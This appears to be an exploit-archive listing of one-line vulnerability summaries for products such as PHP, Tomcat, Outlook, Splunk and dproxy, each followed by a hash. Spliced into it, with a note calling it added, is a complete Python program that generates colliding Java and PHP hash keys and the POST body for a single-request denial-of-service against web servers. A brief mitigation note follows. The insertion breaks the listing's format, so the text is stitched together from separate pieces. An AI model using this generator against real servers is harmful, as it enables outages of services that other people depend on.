This Metasploit module exploits a denial-of-service (DoS) condition present in the hash-table implementations of a variety of programming languages. The vulnerability is triggered when many keys with the same hash value are inserted into a hash table: every insert then degrades to a linear walk of the colliding bucket, so a web server that parses the POST parameters of a request into a hash table can be made to consume hours of CPU with a single HTTP request. Currently only the hash functions for PHP and Java are implemented. The module was tested against PHP + httpd, Tomcat, GlassFish and Geronimo. It also generates a random payload to bypass some IDS signatures.
b029e67e4fc45769ef0806adf780beee36692122a886f5bb14135c025f43efbc
A design bug in X.509 certificate chain validation (RFC 3280) allows attackers to trigger (blind) HTTP requests to both external and internal IPs when a specially crafted, S/MIME-signed email is opened in Microsoft Outlook. This issue, originally reported in 2008, has been revisited: timing differences make it possible to distinguish open and closed ports on internal networks.
9365e6ebb217675995930a39307adaa0068c69e67328ec203f67fb4ba9ac8f00
IBM Lotus iNotes suffered from four cross site scripting vulnerabilities.
618ce3eda1131f575c8580bda8bf0d3b521173ae62782e832850453ccb773385
The Lotus Notes mail client accepts applet tags inside HTML emails, making it possible to load Java applets from a remote location. Combined with known Java sandbox escape vulnerabilities, it can be used to fully compromise the user reading the email.
72507df8ce813a6baed8ae1404ff3467f4a3d09f17024073ea1c0b531c0f08c6
Splunk versions 4.0 through 4.3.4 suffer from an unauthenticated remote denial of service vulnerability against splunkd.
712c0f2ebc8a92c6651117dcb6b048dd30c332c12100a46fccd41ffa48f1183d
Splunk version 4.3.x suffers from a hash-table collision denial of service vulnerability.
d5cbcf654bede60e73b046c746c6d6c0a805b9e9a6f72f4af8548cd3f36fa296
Most hash functions used in hash table implementations can be broken faster than by brute force (which is feasible for hash functions with 32-bit output, but very expensive for 64-bit ones) using one of two "tricks": equivalent substrings or a meet-in-the-middle attack.
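As an added, runnable illustration of the two tricks named above, and of the colliding POST parameters that the hash-collision Metasploit module at the top of this listing sends, here is a small Python generator. It is not code from the module or from any of the listed advisories. The two hash functions reimplement java.lang.String.hashCode() and PHP 5's DJBX33A string hash; the search alphabet, block lengths and the sample target hash are choices made for this demonstration.

```python
"""Colliding keys for the multiplicative string hashes used by Java and PHP 5.

Added example, not part of any listed advisory or of the Metasploit module.
java_hash() and php_hash() reimplement java.lang.String.hashCode() and PHP 5's
DJBX33A; alphabets, lengths and the sample target are demonstration choices.
"""
import itertools
import string

MASK32 = 0xFFFFFFFF
ALNUM = string.ascii_letters + string.digits  # search alphabet for the meet-in-the-middle


def java_hash(s: str) -> int:
    """java.lang.String.hashCode(): h = 31*h + c per UTF-16 unit.
    Unsigned 32-bit view; Java's signed result differs only in sign, not in equality."""
    h = 0
    for c in s:
        h = (31 * h + ord(c)) & MASK32
    return h


def php_hash(s: str) -> int:
    """PHP 5 DJBX33A: h starts at 5381, then h = h*33 + c per byte (32-bit view)."""
    h = 5381
    for c in s.encode("latin-1"):
        h = (h * 33 + c) & MASK32
    return h


def equivalent_blocks(multiplier: int, alphabet: str):
    """Trick 1, step 1: two-character blocks ab with equal multiplier*a + b.
    Both hashes are linear in the characters, so a block contributes
    multiplier**k * (multiplier*a + b) wherever it sits; equal blocks are interchangeable."""
    groups = {}
    for a, b in itertools.product(alphabet, repeat=2):
        groups.setdefault(multiplier * ord(a) + ord(b), []).append(a + b)
    return [g for g in groups.values() if len(g) > 1]


def equivalent_substring_keys(blocks, n_blocks: int):
    """Trick 1, step 2: every concatenation of n_blocks interchangeable blocks
    hashes identically, giving len(blocks)**n_blocks distinct colliding keys."""
    return ["".join(choice) for choice in itertools.product(blocks, repeat=n_blocks)]


def meet_in_the_middle(target: int, alphabet: str, half_len: int, want: int):
    """Trick 2: find strings p+q of length 2*half_len with java_hash(p+q) == target.
    java_hash(p+q) == java_hash(p) * 31**len(q) + java_hash(q)  (mod 2**32),
    so each suffix q fixes the prefix hash it needs; one table of all prefixes
    turns |A|**(2*half_len) brute force into about 2 * |A|**half_len work."""
    table = {}
    for p in itertools.product(alphabet, repeat=half_len):
        p = "".join(p)
        table.setdefault(java_hash(p), []).append(p)
    inv = pow(31, -half_len, 1 << 32)  # 31 is odd, hence invertible mod 2**32
    found = []
    for q in itertools.product(alphabet, repeat=half_len):
        q = "".join(q)
        need = ((target - java_hash(q)) * inv) & MASK32
        for p in table.get(need, ()):
            found.append(p + q)
            if len(found) >= want:
                return found
    return found


def post_body(keys) -> bytes:
    """Body of the single request the DoS needs: one parameter per colliding key."""
    return "&".join(f"{k}=x" for k in keys).encode("ascii")


if __name__ == "__main__":
    print("Java equivalent blocks:", equivalent_blocks(31, string.ascii_letters))
    keys = equivalent_substring_keys(["Aa", "BB"], 16)  # 2**16 keys, one hash value
    print(len(keys), "Java keys, distinct hashes:", len({java_hash(k) for k in keys}))
    php_keys = equivalent_substring_keys(["Ez", "FY"], 16)
    print(len(php_keys), "PHP keys, distinct hashes:", len({php_hash(k) for k in php_keys}))
    print("POST body size:", len(post_body(keys)), "bytes")
    target = java_hash("abc123")  # constructed target; "abc123" lies in the search space
    for s in meet_in_the_middle(target, ALNUM, 3, 5):
        print(s, hex(java_hash(s)))
```

The equivalent-substring trick is what makes the attack cheap: two colliding two-character blocks already yield 2^n colliding keys of length 2n with no search at all. The meet-in-the-middle routine is the fallback for hashes without such blocks, or for aiming at one specific bucket; it only needs the multiplier to be invertible modulo 2^32, which holds for both 31 and 33. The mitigation is the one the affected runtimes shipped afterwards: cap the number of request parameters and/or use a randomized, per-process hash seed.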
5ba7d905a60a09b9e51b4bfc83a4c27718fe15666e0535630b7937cc69f6152f
SQL-Ledger suffers from cross site scripting, cross site request forgery, local file inclusion, SQL injection, and various other security vulnerabilities.
3829bdb05149d1bc7598b7a78e6ebb24bc4dda65fe6aa1226850034c3332a707
CAcert suffered from a cross site scripting vulnerability when parsing a given X.509 certificate.
010dc8224e527b25fcbaf1dd8c4db3d011ad35ad977a4c283f92787b8471e40c
Opera versions below 9.25 are susceptible to a heap-based buffer overflow that allows for a denial of service and possibly code execution.
f6dc341cce8dd3f5bc84c05a0c44cde29463acefebfde3867a34bf222e7aabf7
Debian OpenSSL weak client Diffie-Hellman Exchange checker version 0.1.
f751596b32f587e79025ba709c16d9fdad9f31526709e13da3da0d3110928de6
Apache-SSL versions prior to apache_1.3.41+ssl_1.59 suffer from a memory disclosure vulnerability that may allow for privilege escalation.
39036c5cb769695609adfa378084ea68badbe067b04e9ae812fda9a39d1ed918
Microsoft Office 2007 has a design flaw that allows outbound HTTP requests to be made when a digitally signed document is opened.
b4cb7f3e817924351a210a026c7bec9e430863cef89fb05b4f7fa6540b4f7384
Windows Live Mail has a design flaw that allows outbound HTTP requests to be made via a simple preview of a mail that is S/MIME-signed.
4d5511e520d30bf9ecbbdb40513e02a8b285c8a0a0062c017da8916a99f7afc5
Microsoft Outlook has a design flaw that allows outbound HTTP requests to be made via a simple preview of a mail that is S/MIME-signed.
1ff267973798cd8447b986b796dd166b737f9cbfe9fb69d0bef95485ff36340a
OpenCA version 0.9.2.5 suffers from a cross site request forgery vulnerability.
c8cc08a802f0472bdd435e3b3e2dacbf30c477ffb9c1ff098f2c5e82d42a1001
Stampit Web suffers from a denial of service vulnerability.
e61e043ac6440a474444d36cbba6289065dc1f9dafa15661b38403cd78790bb9
DropAFew versions 0.2 and below suffer from SQL injection vulnerabilities.
d70a0ebccd74c188c38dd1d78303d396a7e2aa349786b47a134cca14004840c7
Metasploit exploit for the remote buffer overflow in dproxy versions 0.5 and below.
93a48384d4123533a4cf4d4b95a8e2faf0006039c1860712e18e3f39485121bc
dproxy suffers from a classic stack-based buffer overflow that allows an attacker to overwrite the stack. Versions 0.5 and below are affected.
105b19b9f636ba774d84d4ddd91b39ff45110d8e236554da8ee19b7dd5e116e5
JSBoard releases 2.0.10 and 2.0.11 suffer from a cross site scripting vulnerability.
ef4921c4eaae2c60489129528cea8016ef9baaaed728b17d6583b53923c60897